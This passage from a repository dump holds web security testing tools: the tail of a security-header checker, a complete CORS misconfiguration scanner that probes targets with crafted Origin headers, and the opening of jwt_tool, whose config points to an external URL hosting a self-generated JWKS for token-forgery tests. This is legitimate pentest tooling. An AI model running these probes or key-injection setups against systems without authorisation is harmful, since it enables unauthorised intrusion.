dict((x.lower(), y) for x, y in hdrs) 135 | 136 | 137 | def append_port(target, port): 138 | return target[:-1] + ':' + port + '/' \ 139 | if target[-1:] == '/' \ 140 | else target + ':' + port + '/' 141 | 142 | 143 | def build_opener(proxy, ssldisabled): 144 | proxyhnd = urllib.request.ProxyHandler() 145 | sslhnd = urllib.request.HTTPSHandler() 146 | if proxy: 147 | proxyhnd = urllib.request.ProxyHandler({ 148 | 'http': proxy, 149 | 'https': proxy 150 | }) 151 | if ssldisabled: 152 | ctx = ssl.create_default_context() 153 | ctx.check_hostname = False 154 | ctx.verify_mode = ssl.CERT_NONE 155 | sslhnd = urllib.request.HTTPSHandler(context = ctx) 156 | 157 | opener = urllib.request.build_opener(proxyhnd, sslhnd) 158 | urllib.request.install_opener(opener) 159 | 160 | 161 | def normalize(target): 162 | try: 163 | if (socket.inet_aton(target)): 164 | target = 'http://' + target 165 | except (ValueError, socket.error): 166 | pass 167 | finally: 168 | return target 169 | 170 | 171 | def print_error(target, e): 172 | sys.stdout = sys.__stdout__ 173 | if isinstance(e, ValueError): 174 | print("Unknown url type") 175 | 176 | elif isinstance(e, urllib.error.HTTPError): 177 | print("[!] URL Returned an HTTP error: {}".format( 178 | colorize(str(e.code), 'error'))) 179 | 180 | elif isinstance(e, urllib.error.URLError): 181 | if "CERTIFICATE_VERIFY_FAILED" in str(e.reason): 182 | print("SSL: Certificate validation error.\nIf you want to \ 183 | ignore it run the program with the \"-d\" option.") 184 | else: 185 | print("Target host {} seems to be unreachable ({})".format(target, e.reason)) 186 | 187 | else: 188 | print("{}".format(str(e))) 189 | 190 | 191 | def check_target(target): 192 | ''' 193 | Just put a protocol to a valid IP and check if connection works, 194 | returning HEAD response 195 | ''' 196 | # Recover used options 197 | ssldisabled = options.ssldisabled 198 | useget = options.useget 199 | usemethod = options.usemethod 200 | proxy = options.proxy 201 | response = None 202 | 203 | target = normalize(target) 204 | 205 | request = urllib.request.Request(target, headers=client_headers) 206 | # Set method 207 | method = "GET" if useget else usemethod 208 | request.get_method = lambda: method 209 | 210 | # Build opener for proxy and SSL 211 | build_opener(proxy, ssldisabled) 212 | try: 213 | response = urllib.request.urlopen(request, timeout=10) 214 | 215 | # Handling issues with HTTP/2 216 | except http.client.UnknownProtocol as e: 217 | print("Unknown protocol: {}. Are you using a proxy? Try disabling it".format(e)) 218 | except Exception as e: 219 | print_error(target, e) 220 | if hasattr(e, 'code') and e.code >= 400 and e.code < 500: 221 | response = e 222 | else: 223 | return None 224 | 225 | if response is not None: 226 | return response 227 | print("Couldn't read a response from server.") 228 | return None 229 | 230 | 231 | def is_https(target): 232 | ''' 233 | Check if target support HTTPS for Strict-Transport-Security 234 | ''' 235 | return target.startswith('https://') 236 | 237 | 238 | def report(target, safe, unsafe): 239 | log("-------------------------------------------------------") 240 | log("[!] Headers analyzed for {}".format(colorize(target, 'info'))) 241 | log("[+] There are {} security headers".format(colorize(str(safe), 'ok'))) 242 | log("[-] There are not {} security headers".format( 243 | colorize(str(unsafe), 'error'))) 244 | log("") 245 | 246 | def parse_csp(csp): 247 | unsafe_operators = ['unsafe-inline', 'unsafe-eval', 'unsafe-hashes', 'wasm-unsafe-eval', 'self'] 248 | log("Value:") 249 | policy_directive = csp.split(";") 250 | for policy in policy_directive: 251 | elements = policy.lstrip().split(" ", 1) 252 | 253 | values = elements[1].replace("*", colorize("*", 'warning')) if len(elements) > 1 else "" 254 | for x in unsafe_operators: 255 | values = values.replace(x, colorize(x, 'error')) 256 | log("\t" + colorize(elements[0], 'info') + (": " + values if values != "" else "")) 257 | 258 | 259 | def main(): 260 | # Getting options 261 | global options 262 | options, targets = parse_options() 263 | 264 | port = options.port 265 | cookie = options.cookie 266 | custom_headers = options.custom_headers 267 | information = options.information 268 | cache_control = options.cache_control 269 | show_deprecated = options.show_deprecated 270 | hfile = options.hfile 271 | json_output = options.json_output 272 | 273 | # Disabling printing if json output is requested 274 | if json_output: 275 | global json_headers 276 | sys.stdout = open(os.devnull, 'w') 277 | 278 | banner() 279 | # Set a custom port if provided 280 | if cookie is not None: 281 | client_headers.update({'Cookie': cookie}) 282 | 283 | # Set custom headers if provided 284 | if custom_headers is not None: 285 | for header in custom_headers: 286 | # Split supplied string of format 'Header: value' 287 | header_split = header.split(': ') 288 | # Add to existing headers using header name and header value 289 | try: 290 | client_headers.update({header_split[0]: header_split[1]}) 291 | except IndexError: 292 | s = "[!] Header strings must be of the format 'Header: value'" 293 | print(s) 294 | raise SystemExit(1) 295 | 296 | if hfile is not None: 297 | with open(hfile) as f: 298 | targets = f.read().splitlines() 299 | 300 | json_out = {} 301 | for target in targets: 302 | json_headers = {} 303 | if port is not None: 304 | target = append_port(target, port) 305 | 306 | safe = 0 307 | unsafe = 0 308 | 309 | log("[*] Analyzing headers of {}".format(colorize(target, 'info'))) 310 | 311 | # Check if target is valid 312 | response = check_target(target) 313 | if not response: 314 | continue 315 | rUrl = response.geturl() 316 | json_results = {} 317 | 318 | log("[*] Effective URL: {}".format(colorize(rUrl, 'info'))) 319 | parse_headers(response.getheaders()) 320 | json_headers[f"{rUrl}"] = json_results 321 | json_results["present"] = {} 322 | json_results["missing"] = [] 323 | 324 | # Before parsing, remove X-Frame-Options if there's CSP with frame-ancestors directive 325 | if "content-security-policy" in headers.keys() and "frame-ancestors" in headers.get("content-security-policy").lower(): 326 | sec_headers.pop("X-Frame-Options", None) 327 | headers.pop("X-Frame-Options".lower(), None) 328 | 329 | for safeh in sec_headers: 330 | lsafeh = safeh.lower() 331 | if lsafeh in headers: 332 | safe += 1 333 | json_results["present"][safeh] = headers.get(lsafeh) 334 | 335 | # Taking care of special headers that could have bad values 336 | 337 | # Parse CSP headers 338 | if lsafeh == 'Content-Security-Policy'.lower(): 339 | log("[*] Header {} is present!".format( 340 | colorize(safeh, 'ok'))) 341 | parse_csp(headers.get(lsafeh)) 342 | 343 | # X-XSS-Protection Should be enabled 344 | elif lsafeh == 'X-XSS-Protection'.lower() and headers.get(lsafeh) == '0': 345 | log("[*] Header {} is present! (Value: {})".format( 346 | colorize(safeh, 'ok'), 347 | colorize(headers.get(lsafeh), 'warning'))) 348 | 349 | # unsafe-url policy is more insecure compared to the default/unset value 350 | elif lsafeh == 'Referrer-Policy'.lower() and headers.get(lsafeh) == 'unsafe-url': 351 | log("[!] Insecure header {} is set! (Value: {})".format( 352 | colorize(safeh, 'warning'), 353 | colorize(headers.get(lsafeh), 'error'))) 354 | 355 | # check for max-age=0 in HSTS 356 | elif lsafeh == 'Strict-Transport-Security'.lower() and "max-age=0" in headers.get(lsafeh): 357 | log("[!] Insecure header {} is set! (Value: {})".format( 358 | colorize(safeh, 'warning'), 359 | colorize(headers.get(lsafeh), 'error'))) 360 | 361 | # Printing generic message if not specified above 362 | else: 363 | log("[*] Header {} is present! (Value: {})".format( 364 | colorize(safeh, 'ok'), 365 | headers.get(lsafeh))) 366 | else: 367 | unsafe += 1 368 | json_results["missing"].append(safeh) 369 | # HSTS works obviously only on HTTPS 370 | if safeh == 'Strict-Transport-Security'.lower() and not is_https(rUrl): 371 | unsafe -= 1 372 | json_results["missing"].remove(safeh) 373 | continue 374 | # Hide deprecated 375 | if not show_deprecated and sec_headers.get(safeh) == "deprecated": 376 | unsafe -= 1 377 | json_results["missing"].remove(safeh) 378 | continue 379 | log('[!] Missing security header: {}'.format( 380 | colorize(safeh, sec_headers.get(safeh)))) 381 | 382 | if information: 383 | json_headers["information_disclosure"] = {} 384 | i_chk = False 385 | log("") 386 | for infoh in information_headers: 387 | linfoh = infoh.lower() 388 | if linfoh in headers: 389 | json_headers["information_disclosure"][infoh] = headers.get(linfoh) 390 | i_chk = True 391 | log("[!] Possible information disclosure: \ 392 | header {} is present! (Value: {})".format( 393 | colorize(infoh, 'warning'), 394 | headers.get(linfoh))) 395 | if not i_chk: 396 | log("[*] No information disclosure headers detected") 397 | 398 | if cache_control: 399 | json_headers["caching"] = {} 400 | c_chk = False 401 | log("") 402 | for cacheh in cache_headers: 403 | lcacheh = cacheh.lower() 404 | if lcacheh in headers: 405 | json_headers["caching"][cacheh] = headers.get(lcacheh) 406 | c_chk = True 407 | log("[!] Cache control header {} is present! \ 408 | (Value: {})".format( 409 | colorize(cacheh, 'info'), 410 | headers.get(lcacheh))) 411 | if not c_chk: 412 | log("[*] No caching headers detected") 413 | 414 | report(rUrl, safe, unsafe) 415 | json_out.update(json_headers) 416 | 417 | if json_output: 418 | sys.stdout = sys.__stdout__ 419 | print(json.dumps(json_out)) 420 | 421 | 422 | 423 | def parse_options(): 424 | parser = OptionParser("Usage: %prog [options] ", prog=sys.argv[0]) 425 | 426 | parser.add_option("-p", "--port", dest="port", 427 | help="Set a custom port to connect to", 428 | metavar="PORT") 429 | parser.add_option("-c", "--cookie", dest="cookie", 430 | help="Set cookies for the request", 431 | metavar="COOKIE_STRING") 432 | parser.add_option("-a", "--add-header", dest="custom_headers", 433 | help="Add headers for the request e.g. 'Header: value'", 434 | metavar="HEADER_STRING", 435 | action="append") 436 | parser.add_option('-d', "--disable-ssl-check", dest="ssldisabled", 437 | default=False, 438 | help="Disable SSL/TLS certificate validation", 439 | action="store_true") 440 | parser.add_option('-g', "--use-get-method", dest="useget", 441 | default=False, help="Use GET method instead HEAD method", 442 | action="store_true") 443 | parser.add_option('-m', "--use-method", dest="usemethod", default='HEAD', 444 | choices=["HEAD", "GET", "POST", "PUT", "DELETE", "TRACE"], 445 | help="Use a specified method",) 446 | parser.add_option("-j", "--json-output", dest="json_output", 447 | default=False, help="Print the output in JSON format", 448 | action="store_true") 449 | parser.add_option("-i", "--information", dest="information", default=False, 450 | help="Display information headers", 451 | action="store_true") 452 | parser.add_option("-x", "--caching", dest="cache_control", default=False, 453 | help="Display caching headers", 454 | action="store_true") 455 | parser.add_option("-k", "--deprecated", dest="show_deprecated", default=False, 456 | help="Display deprecated headers", 457 | action="store_true") 458 | parser.add_option("--proxy", dest="proxy", 459 | help="Set a proxy (Ex: http://127.0.0.1:8080)", 460 | metavar="PROXY_URL") 461 | parser.add_option("--hfile", dest="hfile", 462 | help="Load a list of hosts from a flat file", 463 | metavar="PATH_TO_FILE") 464 | parser.add_option("--colours", dest="colours", 465 | help="Set up a colour profile [dark/light/none]", 466 | default="dark") 467 | parser.add_option("--colors", dest="colours", 468 | help="Alias for colours for US English") 469 | (options, targets) = parser.parse_args() 470 | 471 | if len(targets) < 1 and options.hfile is None: 472 | parser.print_help() 473 | sys.exit(12) 474 | 475 | return options, targets 476 | 477 | if __name__ == "__main__": 478 | main() 479 | -------------------------------------------------------------------------------- /tools/cors_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | __author__ = "Jake Miller (@LaconicWolf)" 5 | __date__ = "20191119" 6 | __version__ = "0.01" 7 | __description__ = """A multi-threaded scanner to help discover CORS flaws.""" 8 | 9 | 10 | import sys 11 | 12 | if not sys.version.startswith('3'): 13 | print('\n[-] This script will only work with Python3. Sorry!\n') 14 | exit() 15 | 16 | import os 17 | import threading 18 | import time 19 | import argparse 20 | from queue import Queue 21 | from urllib.parse import urlparse 22 | from random import randrange, choice 23 | from string import ascii_lowercase 24 | 25 | # Third party modules 26 | missing_modules = [] 27 | try: 28 | import requests 29 | import tqdm 30 | except ImportError as error: 31 | missing_module = str(error).split(' ')[-1] 32 | missing_modules.append(missing_module) 33 | 34 | if missing_modules: 35 | for m in missing_modules: 36 | print('[-] Missing module: {}'.format(m)) 37 | print('[*] Try running "pip3 install {}", or do an Internet search for installation instructions.\n'.format(m.strip("'"))) 38 | exit() 39 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 40 | 41 | 42 | def get_random_useragent(): 43 | """Returns a randomly chosen User-Agent string.""" 44 | win_edge = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246' 45 | win_firefox = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/43.0' 46 | win_chrome = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" 47 | lin_firefox = 'Mozilla/5.0 (X11; Linux i686; rv:30.0) Gecko/20100101 Firefox/42.0' 48 | mac_chrome = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36' 49 | ie = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)' 50 | ua_dict = { 51 | 1: win_edge, 52 | 2: win_firefox, 53 | 3: win_chrome, 54 | 4: lin_firefox, 55 | 5: mac_chrome, 56 | 6: ie 57 | } 58 | rand_num = randrange(1, (len(ua_dict) + 1)) 59 | return ua_dict[rand_num] 60 | 61 | 62 | def print_dict(origin, d): 63 | """Prints the contents of a dictionary.""" 64 | print(f'Origin: {origin}') 65 | for k in d: 66 | with print_lock: 67 | print(f"{k.upper()}:{d.get(k)}") 68 | 69 | 70 | def parse_cors_dict(d): 71 | """Formats dictionary values as a list for printing.""" 72 | cors_headers = [ 73 | 'acao', 74 | 'acac', 75 | 'acam', 76 | 'acah', 77 | 'acma', 78 | 'aceh' 79 | ] 80 | parsed_list = [] 81 | for header in cors_headers: 82 | if header in d.keys(): 83 | parsed_list.append(d.get(header)) 84 | else: 85 | parsed_list.append('') 86 | return parsed_list 87 | 88 | 89 | def write_csv(data): 90 | """Writes a CSV file. Appends to file if it already exists.""" 91 | col_headers = [ 92 | 'URL', 93 | 'Origin', 94 | 'ACAO', 95 | 'ACAC', 96 | 'ACAM', 97 | 'ACAH', 98 | 'ACMA', 99 | 'ACEH' 100 | ] 101 | csv_name = args.csv_name if args.csv_name else 'CORS_Results-' + time.strftime('%d%b%Y%H%M%S') + '.csv' 102 | if os.path.exists(csv_name): 103 | print() 104 | print(f'[+] Appending to {csv_name}.') 105 | with open(csv_name, 'a') as fh: 106 | for item in data: 107 | url = item[0] 108 | origin = item[1] 109 | cors_dict = item[2] 110 | parsed_list = parse_cors_dict(cors_dict) 111 | parsed_string = ','.join(parsed_list) 112 | fh.write(f'{url},{origin},{parsed_string}\n') 113 | else: 114 | print(f'[+] Writing to {csv_name}.') 115 | with open(csv_name, 'w') as fh: 116 | print() 117 | fh.write(','.join(col_headers) + '\n') 118 | for item in data: 119 | url = item[0] 120 | origin = item[1] 121 | cors_dict = item[2] 122 | parsed_list = parse_cors_dict(cors_dict) 123 | parsed_string = ','.join(parsed_list) 124 | fh.write(f'{url},{origin},{parsed_string}\n') 125 | print('[*] Complete!') 126 | 127 | 128 | def parse_cors_response_headers(response): 129 | """Returns a dictionary of CORS response headers from 130 | a specified response object. 131 | """ 132 | cors_response_headers = {} 133 | if 'Access-Control-Allow-Origin' in response.headers.keys(): 134 | cors_response_headers['acao'] = response.headers.get('Access-Control-Allow-Origin').replace(',',';') 135 | if 'Access-Control-Allow-Credentials' in response.headers.keys(): 136 | cors_response_headers['acac'] = response.headers.get('Access-Control-Allow-Credentials').replace(',',';') 137 | if 'Access-Control-Allow-Methods' in response.headers.keys(): 138 | cors_response_headers['acam'] = response.headers.get('Access-Control-Allow-Methods').replace(',',';') 139 | if 'Access-Control-Allow-Headers' in response.headers.keys(): 140 | cors_response_headers['acah'] = response.headers.get('Access-Control-Allow-Headers').replace(',',';') 141 | if 'Access-Control-Max-Age' in response.headers.keys(): 142 | cors_response_headers['acma'] = response.headers.get('Access-Control-Max-Age').replace(',',';') 143 | if 'Access-Control-Expose-Headers' in response.headers.keys(): 144 | cors_response_headers['aceh'] = response.headers.get('Access-Control-Expose-Headers').replace(',',';') 145 | return cors_response_headers 146 | 147 | 148 | def make_request(sess, url): 149 | """Makes a request and returns a response object.""" 150 | try: 151 | return sess.get(url, verify=False) 152 | except Exception as e: 153 | if args.verbose: 154 | print(f'[-] An error occurred: {e}') 155 | return False 156 | 157 | 158 | def existing_cors_policy(url): 159 | """Makes a request with the Origin header value set as the 160 | host and checks to see if any ACAO or ACAC header values appear. 161 | """ 162 | origin = urlparse(url).netloc 163 | s = build_request_object() 164 | s.headers['Origin'] = origin 165 | resp = make_request(s, url) 166 | if not resp: return 167 | cors_response_headers = parse_cors_response_headers(resp) 168 | if any(value != '' for value in cors_response_headers.values()): 169 | data.append((url, origin, cors_response_headers)) 170 | if args.verbose: 171 | print_dict(origin, cors_response_headers) 172 | 173 | 174 | def null_origin(url): 175 | """Makes a request with a null origin header and checks 176 | the response for CORS headers. 177 | """ 178 | origin = 'null' 179 | s = build_request_object() 180 | s.headers['Origin'] = origin 181 | resp = make_request(s, url) 182 | if not resp: return 183 | cors_response_headers = parse_cors_response_headers(resp) 184 | if any(value != '' for value in cors_response_headers.values()): 185 | data.append((url, origin, cors_response_headers)) 186 | if args.verbose: 187 | print_dict(origin, cors_response_headers) 188 | 189 | 190 | def reflected_origin(url): 191 | """Makes a request with a random Origin header value and 192 | checks to see if that value is echoed in the ACAO header. 193 | Returns the ACAO header value or None. 194 | """ 195 | random_string = ''.join(choice(ascii_lowercase) for i in range(12)) 196 | origin = f"{random_string}.com" 197 | s = build_request_object() 198 | s.headers['Origin'] = origin 199 | resp = make_request(s, url) 200 | if not resp: return 201 | cors_response_headers = parse_cors_response_headers(resp) 202 | if any(value != '' for value in cors_response_headers.values()): 203 | data.append((url, origin, cors_response_headers)) 204 | if args.verbose: 205 | print_dict(origin, cors_response_headers) 206 | 207 | 208 | def scheme_origin(url): 209 | """Makes a request checking with the Origin header value as 210 | HTTP or HTTPS, opposite of whatever the URL is, and prints the 211 | CORS headers.""" 212 | scheme = urlparse(url).scheme 213 | if scheme == 'https': 214 | origin = f"http://{urlparse(url).netloc}" 215 | else: 216 | origin = f"https://{urlparse(url).netloc}" 217 | s = build_request_object() 218 | s.headers['Origin'] = origin 219 | resp = make_request(s, url) 220 | if not resp: return 221 | cors_response_headers = parse_cors_response_headers(resp) 222 | if any(value != '' for value in cors_response_headers.values()): 223 | data.append((url, origin, cors_response_headers)) 224 | if args.verbose: 225 | print_dict(origin, cors_response_headers) 226 | 227 | 228 | def mangled_front_origin(url): 229 | """Makes a request with the Origin header value with the regular 230 | value prepended with 12 random characters and prints and CORS 231 | response headers. 232 | """ 233 | random_string = ''.join(choice(ascii_lowercase) for i in range(12)) 234 | origin = f"{random_string}{urlparse(url).netloc}" 235 | s = build_request_object() 236 | s.headers['Origin'] = origin 237 | resp = make_request(s, url) 238 | if not resp: return 239 | cors_response_headers = parse_cors_response_headers(resp) 240 | if any(value != '' for value in cors_response_headers.values()): 241 | data.append((url, origin, cors_response_headers)) 242 | if args.verbose: 243 | print_dict(origin, cors_response_headers) 244 | 245 | 246 | def mangled_rear_origin(url): 247 | """Makes a request with the Origin header value with the regular 248 | value appended with 12 random characters and prints and CORS 249 | response headers. 250 | """ 251 | random_string = ''.join(choice(ascii_lowercase) for i in range(12)) 252 | origin = f"{urlparse(url).netloc.split(':')[0]}.{random_string}.{urlparse(url).netloc.split('.')[-1]}" 253 | s = build_request_object() 254 | s.headers['Origin'] = origin 255 | resp = make_request(s, url) 256 | if not resp: return 257 | cors_response_headers = parse_cors_response_headers(resp) 258 | if any(value != '' for value in cors_response_headers.values()): 259 | data.append((url, origin, cors_response_headers)) 260 | if args.verbose: 261 | print_dict(origin, cors_response_headers) 262 | 263 | 264 | 265 | def build_request_object(): 266 | """Returns a session object with user specified data. 267 | """ 268 | # Initialize a session object 269 | s = requests.Session() 270 | 271 | # Add a user agent from commandline options or select 272 | # a random user agent. 273 | #user_agent = args.useragent if args.useragent else get_random_useragent() 274 | user_agent = get_random_useragent() 275 | s.headers['User-Agent'] = user_agent 276 | 277 | # Parse and add cookies specified from commandline options 278 | if args.cookies: 279 | for item in cookie_list: 280 | domain_cookies = item[1] 281 | cookies = domain_cookies.split(';') 282 | for cookie in cookies: 283 | cookie_name = cookie.split('=')[0].lstrip() 284 | cookie_value = '='.join(cookie.split('=')[1:]).lstrip() 285 | s.cookies[cookie_name] = cookie_value 286 | 287 | # Add referer if specified by commandline options 288 | if args.referer: 289 | s.headers['Referer'] = args.referer 290 | 291 | # Add a proxy if specified by commandline options 292 | if args.proxy: 293 | s.proxies['http'] = args.proxy 294 | s.proxies['https'] = args.proxy 295 | 296 | # Add a custom header if specified 297 | if args.custom_header: 298 | cust_header = args.custom_header.split('~~~')[0] 299 | cust_value = args.custom_header.split('~~~')[1] 300 | s.headers[cust_header] = cust_value 301 | return s 302 | 303 | 304 | def test_cors_policy(url): 305 | """Runs several tests on a URL, each making a request with 306 | a different Origin header value. The responses are parsed and 307 | written to a CSV file. 308 | """ 309 | existing_cors_policy(url) 310 | null_origin(url) 311 | reflected_origin(url) 312 | scheme_origin(url) 313 | mangled_front_origin(url) 314 | mangled_rear_origin(url) 315 | 316 | if not args.verbose: 317 | # Update the status bar 318 | with print_lock: 319 | p_bar.update(counter + 1) 320 | 321 | 322 | def manage_queue(): 323 | """Manages the url queue and calls the test_cors_policy function""" 324 | while True: 325 | current_url = url_queue.get() 326 | test_cors_policy(current_url) 327 | url_queue.task_done() 328 | 329 | 330 | def main(): 331 | for i in range(args.threads): 332 | t = threading.Thread(target=manage_queue) 333 | t.daemon = True 334 | t.start() 335 | 336 | for current_url in urls: 337 | url_queue.put(current_url) 338 | 339 | url_queue.join() 340 | 341 | write_csv(data) 342 | 343 | 344 | 345 | if __name__ == '__main__': 346 | parser = argparse.ArgumentParser() 347 | parser.add_argument("-v", "--verbose", 348 | help="increase output verbosity", 349 | action="store_true") 350 | parser.add_argument("-pr", "--proxy", 351 | help="specify a proxy to use (-pr 127.0.0.1:8080)") 352 | parser.add_argument("-ch", "--custom-header", 353 | nargs="*", 354 | help='specify a custom header and value, delimited with ~~~. Example: -a "X-Custom-Header~~~Custom-Value"') 355 | parser.add_argument("-a", "--auth", 356 | nargs="*", 357 | help='specify a domain, and value delimited with ~~~. Example: -a "example.com~~~Bearer eyJhb..."') 358 | parser.add_argument("-c", "--cookies", 359 | nargs="*", 360 | help='specify a domain(s) and cookie(s) data delimited with ~~~. Example: -c "example.com~~~C1=IlV0ZXh0L2h; C2=AHWqTUmF8I;" "http://example2.com:80~~~Token=19005936-1"') 361 | parser.add_argument("-ua", "--useragent", 362 | help="specify a User Agent string to use. Default is a random User Agent string.") 363 | parser.add_argument("-r", "--referer", 364 | help="specify a referer string to use.") 365 | parser.add_argument("-uf", "--url_file", 366 | help="specify a file containing urls formatted http(s)://addr:port.") 367 | parser.add_argument("-u", "--url", 368 | help="specify a single url formatted http(s)://addr:port.") 369 | parser.add_argument("-csv", "--csv_name", 370 | help="specify a CSV file name. If the file already exists, the file will be appended to.") 371 | parser.add_argument("-t", "--threads", 372 | nargs="?", 373 | type=int, 374 | const=10, 375 | default=10, 376 | help="specify number of threads (default=10)") 377 | parser.add_argument("-to", "--timeout", 378 | nargs="?", 379 | type=int, 380 | default=10, 381 | help="specify number of seconds until a connection timeout (default=10)") 382 | args = parser.parse_args() 383 | 384 | # Suppress SSL warnings in the terminal 385 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 386 | 387 | # Parse the urls 388 | if not args.url and not args.url_file: 389 | parser.print_help() 390 | print("\n[-] Please specify a URL (-u) or an input file containing URLs (-uf).\n") 391 | exit() 392 | if args.url and args.url_file: 393 | parser.print_help() 394 | print("\n[-] Please specify a URL (-u) or an input file containing URLs (-uf). Not both\n") 395 | exit() 396 | if args.url_file: 397 | url_file = args.url_file 398 | if not os.path.exists(url_file): 399 | print("\n[-] The file cannot be found or you do not have permission to open the file. Please check the path and try again\n") 400 | exit() 401 | urls = open(url_file).read().splitlines() 402 | if args.url: 403 | if not args.url.startswith('http'): 404 | parser.print_help() 405 | print("\n[-] Please specify a URL in the format proto://address:port (https://example.com:80).\n") 406 | exit() 407 | urls = [args.url] 408 | 409 | # Parses cookies 410 | if args.cookies: 411 | cookie_list = [] 412 | for item in args.cookies: 413 | if '~~~' not in item: 414 | print('\n[-] Please specify the domain with the cookies using 3 tildes as a delimiter to separate the domain the cookie (-c "https://example.com:8443~~~C1=IlV0ZXh0L2h; C2=AHWqTUmF8I; Token=19005936-1").\n') 415 | exit() 416 | cookie_domain = item.split('~~~')[0] 417 | cookies = item.split('~~~')[1] 418 | if cookie_domain.strip('/') not in [u.strip('/') for u in urls]: 419 | print('\n[-] Could not find {} in the URL list. Make sure to specify the domain in proto://domain:port format. Exiting.\n'.format(cookie_domain)) 420 | exit() 421 | else: 422 | cookie_list.append((cookie_domain, cookies)) 423 | 424 | # Threading lock and queue initialization 425 | print_lock = threading.Lock() 426 | url_queue = Queue() 427 | 428 | # Print banner and arguments 429 | print() 430 | word_banner = '{} version: {}. Coded by: {}'.format(sys.argv[0].title()[:-3], __version__, __author__) 431 | print('=' * len(word_banner)) 432 | print(word_banner) 433 | print('=' * len(word_banner)) 434 | print() 435 | for arg in vars(args): 436 | if getattr(args, arg): 437 | if arg == 'auth': 438 | continue 439 | print('{}: {}'.format(arg.title().replace('_',' '), getattr(args, arg))) 440 | print() 441 | time.sleep(3) 442 | 443 | if not args.verbose: 444 | # Initializes progress bar 445 | p_bar = tqdm.tqdm(range(len(urls))) 446 | counter = 0 447 | 448 | # Shared data variable 449 | data = [] 450 | 451 | main() 452 | -------------------------------------------------------------------------------- /tools/jwt_tool.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # JWT_Tool version 2.2.4 (08_07_2021) 4 | # Written by Andy Tyler (@ticarpi) 5 | # Please use responsibly... 6 | # Software URL: https://github.com/ticarpi/jwt_tool 7 | # Web: https://www.ticarpi.com 8 | # Twitter: @ticarpi 9 | 10 | jwttoolvers = "2.2.4" 11 | import ssl 12 | import sys 13 | import os 14 | import re 15 | import hashlib 16 | import hmac 17 | import base64 18 | import json 19 | import random 20 | import argparse 21 | from datetime import datetime 22 | import configparser 23 | from http.cookies import SimpleCookie 24 | from collections import OrderedDict 25 | try: 26 | from Cryptodome.Signature import PKCS1_v1_5, DSS, pss 27 | from Cryptodome.Hash import SHA256, SHA384, SHA512 28 | from Cryptodome.PublicKey import RSA, ECC 29 | except: 30 | print("WARNING: Cryptodome libraries not imported - these are needed for asymmetric crypto signing and verifying") 31 | print("On most Linux systems you can run the following command to install:") 32 | print("python3 -m pip install pycryptodomex\n") 33 | exit(1) 34 | try: 35 | from termcolor import cprint 36 | except: 37 | print("WARNING: termcolor library is not imported - this is used to make the output clearer and oh so pretty") 38 | print("On most Linux systems you can run the following command to install:") 39 | print("python3 -m pip install termcolor\n") 40 | exit(1) 41 | try: 42 | import requests 43 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 44 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 45 | except: 46 | print("WARNING: Python Requests libraries not imported - these are needed for external service interaction") 47 | print("On most Linux systems you can run the following command to install:") 48 | print("python3 -m pip install requests\n") 49 | exit(1) 50 | # To fix broken colours in Windows cmd/Powershell: uncomment the below two lines. You will need to install colorama: 'python3 -m pip install colorama' 51 | # import colorama 52 | # colorama.init() 53 | 54 | def cprintc(textval, colval): 55 | if not args.bare: 56 | cprint(textval, colval) 57 | 58 | def createConfig(): 59 | privKeyName = "jwttool_custom_private_RSA.pem" 60 | pubkeyName = "jwttool_custom_public_RSA.pem" 61 | ecprivKeyName = "jwttool_custom_private_EC.pem" 62 | ecpubkeyName = "jwttool_custom_public_EC.pem" 63 | jwksName = "jwttool_custom_jwks.json" 64 | if (os.path.isfile(privKeyName)) and (os.path.isfile(pubkeyName)) and (os.path.isfile(ecprivKeyName)) and (os.path.isfile(ecpubkeyName)) and (os.path.isfile(jwksName)): 65 | cprintc("Found existing Public and Private Keys - using these...", "cyan") 66 | origjwks = open(jwksName, "r").read() 67 | jwks_b64 = base64.b64encode(origjwks.encode('ascii')) 68 | else: 69 | # gen RSA keypair 70 | pubKey, privKey = newRSAKeyPair() 71 | with open(privKeyName, 'w') as test_priv_out: 72 | test_priv_out.write(privKey.decode()) 73 | with open(pubkeyName, 'w') as test_pub_out: 74 | test_pub_out.write(pubKey.decode()) 75 | # gen EC keypair 76 | ecpubKey, ecprivKey = newECKeyPair() 77 | with open(ecprivKeyName, 'w') as ectest_priv_out: 78 | ectest_priv_out.write(ecprivKey) 79 | with open(ecpubkeyName, 'w') as ectest_pub_out: 80 | ectest_pub_out.write(ecpubKey) 81 | # gen jwks 82 | new_key = RSA.importKey(pubKey) 83 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 84 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 85 | jwksbuild = buildJWKS(n, e, "jwt_tool") 86 | jwksout = {"keys": []} 87 | jwksout["keys"].append(jwksbuild) 88 | fulljwks = json.dumps(jwksout,separators=(",",":"), indent=4) 89 | with open(jwksName, 'w') as test_jwks_out: 90 | test_jwks_out.write(fulljwks) 91 | jwks_b64 = base64.b64encode(fulljwks.encode('ascii')) 92 | config = configparser.ConfigParser(allow_no_value=True) 93 | config.optionxform = str 94 | config['crypto'] = {'pubkey': pubkeyName, 95 | 'privkey': privKeyName, 96 | 'ecpubkey': ecpubkeyName, 97 | 'ecprivkey': ecprivKeyName, 98 | 'jwks': jwksName} 99 | config['services'] = {'jwt_tool_version': jwttoolvers, 100 | '# To disable the proxy option set this value to: False (no quotes)': None, 'proxy': 'localhost:8080', 101 | '# Set this to the URL you are hosting your custom JWKS file (jwttool_custom_jwks.json) - your own server, or maybe use this cheeky reflective URL (https://httpbin.org/base64/{base64-encoded_JWKS_here})': None, 102 | 'jwksloc': 'https://httpbin.org/base64/'+jwks_b64.decode(), 103 | '# Set this to the 